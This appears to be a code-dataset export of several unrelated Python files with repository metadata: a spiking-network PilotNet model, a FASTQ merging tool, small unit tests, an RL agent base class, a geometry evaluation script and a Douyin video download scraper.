| 33.45977 | 121 | 0.578839 | 1,837 | 11,644 | 3.450191 | 0.113228 | 0.080467 | 0.01988 | 0.013253 | 0.480909 | 0.365415 | 0.270906 | 0.188545 | 0.188545 | 0.161092 | 0 | 0.0611 | 0.267692 | 11,644 | 347 | 122 | 33.556196 | 0.682186 | 0.10134 | 0 | 0.192 | 0 | 0 | 0.017737 | 0 | 0 | 0 | 0 | 0 | 0.02 | 1 | 0.056 | false | 0 | 0.016 | 0.008 | 0.124 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d15022f4a88c68da8665eed5eb539b96905e093a | 3,335 | py | Python | project/models/pilotnet_sdn.py | Barchid/lava-dl-lightning | 9ca1dcfbdd3c1dc9353928efd710e66aaec45a6c | [
"Apache-2.0"
] | 6 | 2021-11-30T01:26:27.000Z | 2022-03-29T02:03:16.000Z | project/models/pilotnet_sdn.py | Barchid/lava-dl-lightning | 9ca1dcfbdd3c1dc9353928efd710e66aaec45a6c | [
"Apache-2.0"
] | null | null | null | project/models/pilotnet_sdn.py | Barchid/lava-dl-lightning | 9ca1dcfbdd3c1dc9353928efd710e66aaec45a6c | [
"Apache-2.0"
] | null | null | null | import torch
import torch.nn.functional as F
import matplotlib.pyplot as plt
import lava.lib.dl.slayer as slayer
def event_rate_loss(x, max_rate=0.01):
mean_event_rate = torch.mean(torch.abs(x))
return F.mse_loss(F.relu(mean_event_rate - max_rate), torch.zeros_like(mean_event_rate))
class Network(torch.nn.Module):
def __init__(self, threshold=0.1, tau_grad=0.5, scale_grad=1., dropout=0.2):
super(Network, self).__init__()
sdnn_params = { # sigma-delta neuron parameters
'threshold': threshold, # delta unit threshold
'tau_grad': tau_grad, # delta unit surrogate gradient relaxation parameter
'scale_grad': scale_grad, # delta unit surrogate gradient scale parameter
'requires_grad': True, # trainable threshold
'shared_param': True, # layer wise threshold
'activation': F.relu, # activation function
}
sdnn_cnn_params = { # conv layer has additional mean only batch norm
**sdnn_params, # copy all sdnn_params
'norm': slayer.neuron.norm.MeanOnlyBatchNorm, # mean only quantized batch normalizaton
}
sdnn_dense_params = { # dense layers have additional dropout units enabled
**sdnn_cnn_params, # copy all sdnn_cnn_params
'dropout': slayer.neuron.Dropout(p=dropout), # neuron dropout
}
self.blocks = torch.nn.ModuleList([ # sequential network blocks
# delta encoding of the input
slayer.block.sigma_delta.Input(sdnn_params),
# convolution layers
slayer.block.sigma_delta.Conv(sdnn_cnn_params, 3, 24, 3, padding=0,
stride=2, weight_scale=2, weight_norm=True),
slayer.block.sigma_delta.Conv(sdnn_cnn_params, 24, 36, 3, padding=0,
stride=2, weight_scale=2, weight_norm=True),
slayer.block.sigma_delta.Conv(sdnn_cnn_params, 36, 64, 3, padding=(1, 0),
stride=(2, 1), weight_scale=2, weight_norm=True),
slayer.block.sigma_delta.Conv(sdnn_cnn_params, 64, 64, 3, padding=0,
stride=1, weight_scale=2, weight_norm=True),
# flatten layer
slayer.block.sigma_delta.Flatten(),
# dense layers
slayer.block.sigma_delta.Dense(sdnn_dense_params, 64 * 40, 100, weight_scale=2, weight_norm=True),
slayer.block.sigma_delta.Dense(sdnn_dense_params, 100, 50, weight_scale=2, weight_norm=True),
slayer.block.sigma_delta.Dense(sdnn_dense_params, 50, 10, weight_scale=2, weight_norm=True),
# linear readout with sigma decoding of output
slayer.block.sigma_delta.Output(sdnn_dense_params, 10, 1, weight_scale=2, weight_norm=True)
])
def forward(self, x):
for block in self.blocks:
x = block(x)
return x
def grad_flow(self, path):
# helps monitor the gradient flow
grad = [b.synapse.grad_norm for b in self.blocks if hasattr(b, 'synapse')]
plt.figure()
plt.semilogy(grad)
plt.savefig(path + 'gradFlow.png')
plt.close()
return grad
| 46.971831 | 110 | 0.608396 | 420 | 3,335 | 4.630952 | 0.292857 | 0.056555 | 0.082262 | 0.107969 | 0.303342 | 0.266324 | 0.252956 | 0.224679 | 0.184062 | 0.184062 | 0 | 0.028157 | 0.297151 | 3,335 | 70 | 111 | 47.642857 | 0.801621 | 0.174813 | 0 | 0.037736 | 0 | 0 | 0.033687 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075472 | false | 0 | 0.075472 | 0 | 0.226415 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d1504b5e1a66f44f2bbe9a4a52589a12450fc480 | 3,543 | py | Python | htsworkflow/pipelines/desplit_fastq.py | detrout/htsworkflow | 99d3300e2533d79428ad49aaf10b9429b175da2d | [
"BSD-3-Clause"
] | null | null | null | htsworkflow/pipelines/desplit_fastq.py | detrout/htsworkflow | 99d3300e2533d79428ad49aaf10b9429b175da2d | [
"BSD-3-Clause"
] | 1 | 2018-02-26T18:30:05.000Z | 2018-02-26T18:30:05.000Z | htsworkflow/pipelines/desplit_fastq.py | detrout/htsworkflow | 99d3300e2533d79428ad49aaf10b9429b175da2d | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
"""Write fastq data from multiple compressed files into a single file
"""
import bz2
import gzip
from glob import glob
import os
from optparse import OptionParser
import sys
from htsworkflow.util.version import version
from htsworkflow.util.opener import autoopen, isurllike
from htsworkflow.util.conversion import parse_slice
SEQ_HEADER = 0
SEQUENCE = 1
QUAL_HEADER = 2
QUALITY = 3
INVALID = -1
def main(cmdline=None):
"""Command line driver: [None, 'option', '*.fastq.bz2']
"""
parser = make_parser()
opts, args = parser.parse_args(cmdline)
if opts.version:
print (version())
return 0
if opts.output is not None:
output = open_output(opts.output, opts)
else:
output = sys.stdout
desplitter = DesplitFastq(file_generator(args), output)
desplitter.trim = parse_slice(opts.slice)
desplitter.run()
return 0
def make_parser():
"""Generate an option parser for above main function"""
usage = '%prog: [options] *.fastq.gz'
parser = OptionParser(usage)
parser.add_option('-o', '--output', default=None,
help='output fastq file')
parser.add_option('-s', '--slice',
help="specify python slice, e.g. 0:75, 0:-1",
default=None)
parser.add_option('--gzip', default=False, action='store_true',
help='gzip output')
parser.add_option('--bzip', default=False, action='store_true',
help='bzip output')
parser.add_option("--version", default=False, action="store_true",
help="report software version")
return parser
def open_output(output, opts):
"""Open output file with right compression library
"""
if opts.bzip:
return bz2.open(output, 'wt')
elif opts.gzip:
return gzip.open(output, 'wt')
else:
return open(output, 'w')
def file_generator(pattern_list):
"""Given a list of glob patterns return decompressed streams
"""
for pattern in pattern_list:
if isurllike(pattern, 'rt'):
yield autoopen(pattern, 'rt')
else:
for filename in glob(pattern):
yield autoopen(filename, 'rt')
class DesplitFastq(object):
"""Merge multiple fastq files into a single file"""
def __init__(self, sources, destination):
self.sources = sources
self.destination = destination
self.making_fastq = True
self.trim = slice(None)
def run(self):
"""Do the conversion
This is here so we can run via threading/multiprocessing APIs
"""
state = SEQ_HEADER
files_read = 0
for stream in self.sources:
files_read += 1
for line in stream:
line = line.rstrip()
if state == SEQ_HEADER:
self.destination.write(line)
state = SEQUENCE
elif state == SEQUENCE:
self.destination.write(line[self.trim])
state = QUAL_HEADER
elif state == QUAL_HEADER:
self.destination.write(line)
state = QUALITY
elif state == QUALITY:
self.destination.write(line[self.trim])
state = SEQ_HEADER
self.destination.write(os.linesep)
if files_read == 0:
raise RuntimeError("No files processed")
if __name__ == "__main__":
main()
| 28.344 | 70 | 0.589613 | 408 | 3,543 | 5.017157 | 0.343137 | 0.029311 | 0.036639 | 0.046898 | 0.153395 | 0.133854 | 0.03615 | 0 | 0 | 0 | 0 | 0.007344 | 0.308213 | 3,543 | 124 | 71 | 28.572581 | 0.827825 | 0.123624 | 0 | 0.126437 | 0 | 0 | 0.076368 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0 | 0.103448 | 0 | 0.252874 | 0.011494 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d1512f6092d7ca8b600283a45a28d8f247b869fe | 538 | py | Python | test/test_getRevDns.py | hotpeppersec/Assassin | d2b8bb17de84f98f002c66276efc8b3e213ce251 | [
"Apache-2.0"
] | 1 | 2021-07-13T00:19:45.000Z | 2021-07-13T00:19:45.000Z | test/test_getRevDns.py | skanner909/Assassin | 50ea64d8d3b0f50db0961c77952d77c26bf921f5 | [
"Apache-2.0"
] | 7 | 2020-03-18T18:40:13.000Z | 2020-03-31T16:20:02.000Z | test/test_getRevDns.py | skanner909/Assassin | 50ea64d8d3b0f50db0961c77952d77c26bf921f5 | [
"Apache-2.0"
] | 1 | 2020-04-14T15:27:47.000Z | 2020-04-14T15:27:47.000Z | # -*- coding: utf-8 -*-
"""
"""
import pytest
import json
from assassin.lib.helper_functions import validate_ip
from assassin.lib.helper_functions import getRevDns
def test_getRevDns_com(capsys):
response = []
response = getRevDns('173.245.58.51')
assert 'ns1.digitalocean.com.' in response
__author__ = 'Franklin Diaz'
__copyright__ = ''
__credits__ = ['{credit_list}']
__license__ = 'http://www.apache.org/licenses/LICENSE-2.0'
__version__ = ''
__maintainer__ = ''
__email__ = 'fdiaz@paloaltonetworks.com' | 22.416667 | 61 | 0.708178 | 62 | 538 | 5.596774 | 0.758065 | 0.069164 | 0.086455 | 0.121037 | 0.207493 | 0.207493 | 0 | 0 | 0 | 0 | 0 | 0.030769 | 0.154275 | 538 | 24 | 62 | 22.416667 | 0.731868 | 0.039033 | 0 | 0 | 0 | 0 | 0.251473 | 0.092338 | 0 | 0 | 0 | 0 | 0.066667 | 1 | 0.066667 | false | 0 | 0.266667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d1513d100c1921d1e2f9846b7e329d203bde39cf | 2,471 | py | Python | agents/base_agent.py | floringogianu/categorical-dqn | eb939785e0e2eea60bbd67abeaedf4a9990fb5ce | [
"MIT"
] | 111 | 2017-07-27T13:19:21.000Z | 2022-01-15T17:52:55.000Z | agents/base_agent.py | floringogianu/categorical-dqn | eb939785e0e2eea60bbd67abeaedf4a9990fb5ce | [
"MIT"
] | 3 | 2017-12-05T07:18:23.000Z | 2018-04-30T00:03:36.000Z | agents/base_agent.py | floringogianu/categorical-dqn | eb939785e0e2eea60bbd67abeaedf4a9990fb5ce | [
"MIT"
] | 12 | 2017-07-31T13:46:25.000Z | 2021-08-23T04:03:19.000Z | import time
from termcolor import colored as clr
from utils import not_implemented
class BaseAgent(object):
def __init__(self, env_space):
self.actions = env_space[0]
self.action_no = self.actions.n
self.state_dims = env_space[1].shape[0:2]
self.step_cnt = 0
self.ep_cnt = 0
self.ep_reward_cnt = 0
self.ep_reward = []
self.max_mean_rw = -100
def evaluate_policy(self, obs):
not_implemented(self)
def improve_policy(self, _state, _action, reward, state, done):
not_implemented(self)
def gather_stats(self, reward, done):
self.step_cnt += 1
self.ep_reward_cnt += reward
if done:
self.ep_cnt += 1
self.ep_reward.append(self.ep_reward_cnt)
self.ep_reward_cnt = 0
def display_setup(self, env, config):
emph = ["env_name", "agent_type", "label", "batch_size", "lr",
"hist_len"]
print("-------------------------------------------------")
for k in config.__dict__:
if config.__dict__[k] is not None:
v = config.__dict__[k]
space = "." * (32 - len(k))
config_line = "%s: %s %s" % (k, space, v)
for e in emph:
if k == e:
config_line = clr(config_line, attrs=['bold'])
print(config_line)
print("-------------------------------------------------")
custom = {"no_of_actions": self.action_no}
for k, v in custom.items():
space = "." * (32 - len(k))
print("%s: %s %s" % (k, space, v))
print("-------------------------------------------------")
def display_stats(self, start_time):
fps = self.cmdl.report_frequency / (time.perf_counter() - start_time)
print(clr("[%s] step=%7d, fps=%.2f " % (self.name, self.step_cnt, fps),
attrs=['bold']))
self.ep_reward.clear()
def display_final_report(self, ep_cnt, step_cnt, global_time):
elapsed_time = time.perf_counter() - global_time
fps = step_cnt / elapsed_time
print(clr("[ %s ] finished after %d eps, %d steps. "
% ("Main", ep_cnt, step_cnt), 'white', 'on_grey'))
print(clr("[ %s ] finished after %.2fs, %.2ffps. "
% ("Main", elapsed_time, fps), 'white', 'on_grey'))
def display_model_stats(self):
pass
| 35.811594 | 79 | 0.509106 | 300 | 2,471 | 3.923333 | 0.336667 | 0.050977 | 0.071368 | 0.050977 | 0.122345 | 0.016992 | 0 | 0 | 0 | 0 | 0 | 0.012252 | 0.306354 | 2,471 | 68 | 80 | 36.338235 | 0.674446 | 0 | 0 | 0.157895 | 0 | 0 | 0.152975 | 0.05949 | 0 | 0 | 0 | 0 | 0 | 1 | 0.140351 | false | 0.017544 | 0.052632 | 0 | 0.210526 | 0.140351 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d153d8522b0db3f1572038e9720026aa1f6a282f | 851 | py | Python | tests/test_state_metrics/test_trace_distance.py | paniash/toqito | ab67c2a3fca77b3827be11d1e79531042ea62b82 | [
"MIT"
] | 76 | 2020-01-28T17:02:01.000Z | 2022-02-14T18:02:15.000Z | tests/test_state_metrics/test_trace_distance.py | paniash/toqito | ab67c2a3fca77b3827be11d1e79531042ea62b82 | [
"MIT"
] | 82 | 2020-05-31T20:09:38.000Z | 2022-03-28T17:13:59.000Z | tests/test_state_metrics/test_trace_distance.py | paniash/toqito | ab67c2a3fca77b3827be11d1e79531042ea62b82 | [
"MIT"
] | 30 | 2020-04-02T16:07:11.000Z | 2022-02-05T13:39:22.000Z | """Tests for trace_distance."""
import numpy as np
from toqito.state_metrics import trace_distance
from toqito.states import basis
def test_trace_distance_same_state():
r"""Test that: :math:`T(\rho, \sigma) = 0` iff `\rho = \sigma`."""
e_0, e_1 = basis(2, 0), basis(2, 1)
e_00 = np.kron(e_0, e_0)
e_11 = np.kron(e_1, e_1)
u_vec = 1 / np.sqrt(2) * (e_00 + e_11)
rho = u_vec * u_vec.conj().T
sigma = rho
res = trace_distance(rho, sigma)
np.testing.assert_equal(np.isclose(res, 0), True)
def test_trace_distance_non_density_matrix():
r"""Test trace distance on non-density matrix."""
rho = np.array([[1, 2], [3, 4]])
sigma = np.array([[5, 6], [7, 8]])
with np.testing.assert_raises(ValueError):
trace_distance(rho, sigma)
if __name__ == "__main__":
np.testing.run_module_suite()
| 25.029412 | 70 | 0.639248 | 143 | 851 | 3.531469 | 0.426573 | 0.180198 | 0.10099 | 0.079208 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044053 | 0.199765 | 851 | 33 | 71 | 25.787879 | 0.697504 | 0.150411 | 0 | 0 | 0 | 0 | 0.011315 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 1 | 0.095238 | false | 0 | 0.142857 | 0 | 0.238095 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d1574ac3116c191f004f447f2413fccfc277754b | 750 | py | Python | data/transcoder_evaluation_gfg/python/CALCULATE_VOLUME_DODECAHEDRON.py | mxl1n/CodeGen | e5101dd5c5e9c3720c70c80f78b18f13e118335a | [
"MIT"
] | 241 | 2021-07-20T08:35:20.000Z | 2022-03-31T02:39:08.000Z | data/transcoder_evaluation_gfg/python/CALCULATE_VOLUME_DODECAHEDRON.py | mxl1n/CodeGen | e5101dd5c5e9c3720c70c80f78b18f13e118335a | [
"MIT"
] | 49 | 2021-07-22T23:18:42.000Z | 2022-03-24T09:15:26.000Z | data/transcoder_evaluation_gfg/python/CALCULATE_VOLUME_DODECAHEDRON.py | mxl1n/CodeGen | e5101dd5c5e9c3720c70c80f78b18f13e118335a | [
"MIT"
] | 71 | 2021-07-21T05:17:52.000Z | 2022-03-29T23:49:28.000Z | # Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
import math
def f_gold ( side ) :
return ( ( ( 15 + ( 7 * ( math.sqrt ( 5 ) ) ) ) / 4 ) * ( math.pow ( side , 3 ) ) )
#TOFILL
if __name__ == '__main__':
param = [
(56,),
(73,),
(22,),
(10,),
(84,),
(20,),
(51,),
(91,),
(10,),
(83,)
]
n_success = 0
for i, parameters_set in enumerate(param):
if abs(1 - (0.0000001 + abs(f_gold(*parameters_set))) / (abs(f_filled(*parameters_set)) + 0.0000001)) < 0.001:
n_success+=1
print("#Results: %i, %i" % (n_success, len(param))) | 23.4375 | 118 | 0.54 | 102 | 750 | 3.803922 | 0.666667 | 0.061856 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098148 | 0.28 | 750 | 32 | 119 | 23.4375 | 0.62037 | 0.246667 | 0 | 0.095238 | 0 | 0 | 0.043011 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.047619 | 0.047619 | 0.142857 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d159c73f1a62af8d6b47a255f92f31f0c88a5090 | 5,518 | py | Python | douyin/douyin_pro.py | Adsryen/python-spiders | 005513c78e82eaa3671d584c58a35b009aa7fd01 | [
"MIT"
] | 31 | 2022-01-02T11:35:36.000Z | 2022-03-26T16:56:08.000Z | douyin/douyin_pro.py | Adsryen/python-spiders | 005513c78e82eaa3671d584c58a35b009aa7fd01 | [
"MIT"
] | null | null | null | douyin/douyin_pro.py | Adsryen/python-spiders | 005513c78e82eaa3671d584c58a35b009aa7fd01 | [
"MIT"
] | 12 | 2022-01-07T04:04:57.000Z | 2022-03-29T08:22:24.000Z | #!/usr/bin/env python
# encoding: utf-8
'''
#-------------------------------------------------------------------
# CONFIDENTIAL --- CUSTOM STUDIOS
#-------------------------------------------------------------------
#
# @Project Name : 抖音下载小助手加强版
#
# @File Name : main.py
#
# @Programmer : autofelix
#
# @Start Date : 2022/01/09 13:14
#
# @Last Update : 2022/01/09 13:14
#
#-------------------------------------------------------------------
'''
from splinter.driver.webdriver.chrome import Options, Chrome
from splinter.browser import Browser
from contextlib import closing
import requests, json, time, re, os, sys, time
from bs4 import BeautifulSoup
class DouYin(object):
def __init__(self, width = 500, height = 300):
"""
抖音App视频下载
"""
# 无头浏览器
chrome_options = Options()
chrome_options.add_argument('user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"')
self.driver = Browser(driver_name='chrome', executable_path='D:/chromedriver', options=chrome_options, headless=True)
def get_video_urls(self, user_id):
"""
获得视频播放地址
Parameters:
user_id:查询的用户ID
Returns:
video_names: 视频名字列表
video_urls: 视频链接列表
nickname: 用户昵称
"""
video_names = []
video_urls = []
unique_id = ''
while unique_id != user_id:
search_url = 'https://api.amemv.com/aweme/v1/discover/search/?cursor=0&keyword=%s&count=10&type=1&retry_type=no_retry&iid=17900846586&device_id=34692364855&ac=wifi&channel=xiaomi&aid=1128&app_name=aweme&version_code=162&version_name=1.6.2&device_platform=android&ssmix=a&device_type=MI+5&device_brand=Xiaomi&os_api=24&os_version=7.0&uuid=861945034132187&openudid=dc451556fc0eeadb&manifest_version_code=162&resolution=1080*1920&dpi=480&update_version_code=1622' % user_id
req = requests.get(url = search_url, verify = False)
html = json.loads(req.text)
aweme_count = html['user_list'][0]['user_info']['aweme_count']
uid = html['user_list'][0]['user_info']['uid']
nickname = html['user_list'][0]['user_info']['nickname']
unique_id = html['user_list'][0]['user_info']['unique_id']
user_url = 'https://www.douyin.com/aweme/v1/aweme/post/?user_id=%s&max_cursor=0&count=%s' % (uid, aweme_count)
req = requests.get(url = user_url, verify = False)
html = json.loads(req.text)
i = 1
for each in html['aweme_list']:
share_desc = each['share_info']['share_desc']
if '抖音-原创音乐短视频社区' == share_desc:
video_names.append(str(i) + '.mp4')
i += 1
else:
video_names.append(share_desc + '.mp4')
video_urls.append(each['share_info']['share_url'])
return video_names, video_urls, nickname
def get_download_url(self, video_url):
"""
获得带水印的视频播放地址
Parameters:
video_url:带水印的视频播放地址
Returns:
download_url: 带水印的视频下载地址
"""
req = requests.get(url = video_url, verify = False)
bf = BeautifulSoup(req.text, 'lxml')
script = bf.find_all('script')[-1]
video_url_js = re.findall('var data = \[(.+)\];', str(script))[0]
video_html = json.loads(video_url_js)
download_url = video_html['video']['play_addr']['url_list'][0]
return download_url
def video_downloader(self, video_url, video_name, watermark_flag=True):
"""
视频下载
Parameters:
video_url: 带水印的视频地址
video_name: 视频名
watermark_flag: 是否下载不带水印的视频
Returns:
无
"""
size = 0
if watermark_flag == True:
video_url = self.remove_watermark(video_url)
else:
video_url = self.get_download_url(video_url)
with closing(requests.get(video_url, stream=True, verify = False)) as response:
chunk_size = 1024
content_size = int(response.headers['content-length'])
if response.status_code == 200:
sys.stdout.write(' [文件大小]:%0.2f MB\n' % (content_size / chunk_size / 1024))
with open(video_name, "wb") as file:
for data in response.iter_content(chunk_size = chunk_size):
file.write(data)
size += len(data)
file.flush()
sys.stdout.write(' [下载进度]:%.2f%%' % float(size / content_size * 100) + '\r')
sys.stdout.flush()
def remove_watermark(self, video_url):
"""
获得无水印的视频播放地址
Parameters:
video_url: 带水印的视频地址
Returns:
无水印的视频下载地址
"""
self.driver.visit('http://douyin.iiilab.com/')
self.driver.find_by_tag('input').fill(video_url)
self.driver.find_by_xpath('//button[@class="btn btn-default"]').click()
html = self.driver.find_by_xpath('//div[@class="thumbnail"]/div/p')[0].html
bf = BeautifulSoup(html, 'lxml')
return bf.find('a').get('href')
def run(self):
"""
运行函数
Parameters:
None
Returns:
None
"""
self.hello()
user_id = input('请输入ID(例如40103580):')
video_names, video_urls, nickname = self.get_video_urls(user_id)
if nickname not in os.listdir():
os.mkdir(nickname)
print('视频下载中:共有%d个作品!\n' % len(video_urls))
for num in range(len(video_urls)):
print(' 解析第%d个视频链接 [%s] 中,请稍后!\n' % (num+1, video_urls[num]))
if '\\' in video_names[num]:
video_name = video_names[num].replace('\\', '')
elif '/' in video_names[num]:
video_name = video_names[num].replace('/', '')
else:
video_name = video_names[num]
self.video_downloader(video_urls[num], os.path.join(nickname, video_name))
print('\n')
print('下载完成!')
def hello(self):
"""
打印欢迎界面
Parameters:
None
Returns:
None
"""
print('*' * 100)
print('\t\t\t\t抖音App视频下载小助手')
print('*' * 100)
if __name__ == '__main__':
douyin = DouYin()
douyin.run()
| 31.175141 | 473 | 0.643893 | 749 | 5,518 | 4.543391 | 0.364486 | 0.035263 | 0.019101 | 0.015281 | 0.112254 | 0.070526 | 0.045842 | 0.045842 | 0.02586 | 0.02586 | 0 | 0.040696 | 0.167271 | 5,518 | 176 | 474 | 31.352273 | 0.699891 | 0.200254 | 0 | 0.075269 | 0 | 0.032258 | 0.261753 | 0.012323 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075269 | false | 0 | 0.053763 | 0 | 0.172043 | 0.075269 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |